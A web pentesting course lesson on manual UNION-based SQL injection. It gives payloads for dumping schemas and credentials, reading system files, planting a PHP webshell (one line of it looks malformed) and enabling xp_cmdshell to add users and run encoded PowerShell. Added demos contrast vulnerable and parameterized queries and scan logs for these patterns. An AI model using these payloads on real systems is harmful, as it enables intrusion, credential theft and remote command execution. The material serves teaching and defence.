Web Application Penetration Testing Complete Masterclass

🌐 Web Pentest · Both Beginner 16 modules 2.7h 0 enrolled
From zero-knowledge to professional-grade tester. Every attack explained step-by-step with real payloads, full methodology, beginner mindset guidance, and a complete corporate pentest report at the end.
Instructor
lazyhackers
Free Course

Curriculum — 5 sections · 16 modules · 2.7h

Manual SQLi Exploitation — UNION Attacks

Lesson · 10 min

UNION-based injection lets you retrieve data from other tables by appending your own SELECT statement to the application's query. It is the most powerful and most common SQLi exploitation technique.

Step 1 — Find Number of Columns

# Method 1: ORDER BY (increment until error appears)
?id=1' ORDER BY 1--   # No error
?id=1' ORDER BY 2--   # No error  
?id=1' ORDER BY 3--   # No error
?id=1' ORDER BY 4--   # ERROR = 3 columns total

# Method 2: UNION SELECT with NULLs (add NULLs until no error)
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--    # No error = 3 columns confirmed

Step 2 — Find Printable Columns

# Replace nulls one-by-one with a string to find which columns display on page
' UNION SELECT 'INJECT_TEST_1',NULL,NULL--
' UNION SELECT NULL,'INJECT_TEST_2',NULL--
' UNION SELECT NULL,NULL,'INJECT_TEST_3'--
# Look for INJECT_TEST_x in the page response
# Column 2 appears on page → inject all data through column 2

Step 3 — Extract Database Information

# ── MYSQL ──────────────────────────────────────────────────────
# Get current user, version, database name
' UNION SELECT user(),version(),database()--

# List all databases
' UNION SELECT schema_name,NULL,NULL FROM information_schema.schemata--

# List tables in current database
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database()--

# List columns in a specific table
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

# Dump credentials
' UNION SELECT username,password,email FROM users--

# Concatenate if only one printable column
' UNION SELECT CONCAT(username,':',password),NULL,NULL FROM users--

# ── MSSQL ──────────────────────────────────────────────────────
' UNION SELECT @@version,NULL,NULL--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--

# ── POSTGRESQL ─────────────────────────────────────────────────
' UNION SELECT version(),NULL,NULL--
' UNION SELECT usename,passwd,NULL FROM pg_shadow--   # Requires superuser

# ── ORACLE ─────────────────────────────────────────────────────
' UNION SELECT NULL,NULL FROM dual--   # Oracle needs FROM dual
' UNION SELECT table_name,NULL FROM all_tables--
' UNION SELECT username,password FROM dba_users--
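Added example (not part of the course material): the two request handlers that Steps 1 to 3 above implicitly contrast, a vulnerable one that pastes the parameter into the SQL text and a hardened one that binds it. It runs against a constructed in-memory SQLite database standing in for MySQL; the error strings differ from MySQL, but an out-of-range ORDER BY and a UNION column-count mismatch fail in the same way, and the simulated page template shows only column 2, which is why the Step 2 marker test matters. The table and column names, the handler names and the sample rows are all assumptions for the demo.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory schema: a 3-column product lookup plus a users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (1, 'Widget', '9.99'), (2, 'Gadget', '19.99');
        CREATE TABLE users (username TEXT, password TEXT, email TEXT);
        INSERT INTO users VALUES ('admin', 'hunter2', 'admin@example.test');
    """)
    return conn


def lookup_vulnerable(conn, product_id: str):
    """Vulnerable handler: the request parameter becomes part of the SQL text,
    so a quote followed by ORDER BY / UNION changes the statement itself."""
    sql = "SELECT id, name, price FROM products WHERE id = '" + product_id + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, product_id: str):
    """Hardened handler: the parameter is bound, so whatever it contains is
    compared as a value and can never add clauses to the query."""
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


def render_page(rows) -> str:
    """Simulated template that displays only the product name (column 2).
    That is the 'printable column' Step 2 is looking for."""
    return "\n".join(str(row[1]) for row in rows)


def probe(handler, conn, payload: str) -> str:
    """Return what a tester observes for one input: rendered page text or an error."""
    try:
        return "PAGE: " + render_page(handler(conn, payload))
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)


if __name__ == "__main__":
    conn = build_demo_db()
    for payload in [
        "1' ORDER BY 3--",                                   # Step 1: no error
        "1' ORDER BY 4--",                                   # Step 1: error, so 3 columns
        "1' UNION SELECT NULL,NULL--",                       # Step 1 method 2: count mismatch
        "' UNION SELECT 'INJECT_TEST_1',NULL,NULL--",        # Step 2: column 1 is not shown
        "' UNION SELECT NULL,'INJECT_TEST_2',NULL--",        # Step 2: column 2 is shown
        "' UNION SELECT username,password,email FROM users--",  # Step 3: column 2 = password
    ]:
        print(f"{payload!r:60} -> {probe(lookup_vulnerable, conn, payload)}")
        print(f"{'(parameterized)':60} -> {probe(lookup_parameterized, conn, payload)}")
```

Run it and the vulnerable handler reproduces the whole Step 1 to 3 sequence, while the parameterized handler returns an empty page for every payload because the entire string is compared against the id column. One caveat for the fix side: binding only protects values. A column name or ORDER BY term taken from user input cannot be bound and must be checked against an allow-list instead.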

Step 4 — File Read & Webshell (MySQL)

# Read local file (requires FILE privilege)
' UNION SELECT load_file('/etc/passwd'),NULL,NULL--
' UNION SELECT load_file('C:/Windows/win.ini'),NULL,NULL--

# Write webshell to disk (requires write permission to webroot)
' UNION SELECT '<?php system(["cmd"]); ?>',NULL,NULL
  INTO OUTFILE '/var/www/html/shell.php'--

# Access your webshell
curl https://target.com/shell.php?cmd=id

MSSQL — OS Command Execution via xp_cmdshell

# Enable xp_cmdshell (requires sysadmin privilege)
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE;--
'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--

# Execute OS commands
'; EXEC xp_cmdshell('whoami');--
'; EXEC xp_cmdshell('net user hacker P@ss123! /add');--
'; EXEC xp_cmdshell('powershell -enc BASE64_ENCODED_PAYLOAD');--
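Added example from the defender's side (not part of the course material): a small log scanner that recognises the request patterns this lesson teaches, from the incrementing ORDER BY probe of Step 1, through UNION SELECT and information_schema reads, to load_file/INTO OUTFILE and the sp_configure/xp_cmdshell sequence above. The access-log lines are constructed for the demo, the log format is assumed to be Apache/nginx combined style, and the indicator names and thresholds are my own choices.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format, shortened); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /item?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2025:10:00:02 +0000] "GET /item?id=1%27%20ORDER%20BY%201-- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2025:10:00:03 +0000] "GET /item?id=1%27%20ORDER%20BY%202-- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2025:10:00:04 +0000] "GET /item?id=1%27%20ORDER%20BY%203-- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2025:10:00:05 +0000] "GET /item?id=1%27%20ORDER%20BY%204-- HTTP/1.1" 500 231
10.0.0.9 - - [01/Jan/2025:10:00:06 +0000] "GET /item?id=1%27%20UNION%20SELECT%20NULL,NULL,NULL-- HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2025:10:00:07 +0000] "GET /item?id=1%27;%20EXEC%20sp_configure%20%27xp_cmdshell%27,1;%20RECONFIGURE;-- HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2025:10:00:08 +0000] "GET /search?q=union+station HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicator patterns, applied to the URL-decoded request so %27/%20 encoding does not hide them.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+(\d+)\s*--", re.I),
    "info_schema": re.compile(r"\binformation_schema\.", re.I),
    "file_io": re.compile(r"\bload_file\s*\(|\binto\s+outfile\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b|\bsp_configure\b", re.I),
}


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["path"])
    rec["status"] = int(rec["status"])
    return rec


def scan_log(text: str):
    """Return (hits, order_by_seq): per-request indicator hits, plus every
    ORDER BY N probe grouped by client as (N, status) in log order."""
    hits = []
    order_by_seq = defaultdict(list)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        matched = [name for name, rx in INDICATORS.items() if rx.search(rec["decoded"])]
        probe = INDICATORS["order_by_probe"].search(rec["decoded"])
        if probe:
            order_by_seq[rec["ip"]].append((int(probe.group(1)), rec["status"]))
        if matched:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                         "indicators": matched, "request": rec["decoded"]})
    return hits, dict(order_by_seq)


def column_count_enumeration(order_by_seq, min_steps: int = 3):
    """Flag clients whose ORDER BY N values climb by one and end in a 5xx error:
    the signature of Step 1. Returns {ip: column count the attacker learned},
    i.e. the largest N that did not error."""
    findings = {}
    for ip, seq in order_by_seq.items():
        values = [n for n, _ in seq]
        if len(values) < min_steps or values != list(range(values[0], values[0] + len(values))):
            continue
        ok = [n for n, status in seq if status < 500]
        errored = any(status >= 500 for _, status in seq)
        if ok and errored:
            findings[ip] = max(ok)
    return findings


if __name__ == "__main__":
    hits, seqs = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], h["indicators"], h["request"])
    print("column-count enumeration:", column_count_enumeration(seqs))
```

The per-request indicators catch single payloads; the sequence check is what turns four individually harmless-looking 200 responses followed by a 500 into a finding, and its result (3 columns for 10.0.0.9) tells you exactly how far the attacker got. The search for "union station" shows why the UNION pattern requires a following SELECT rather than the bare word.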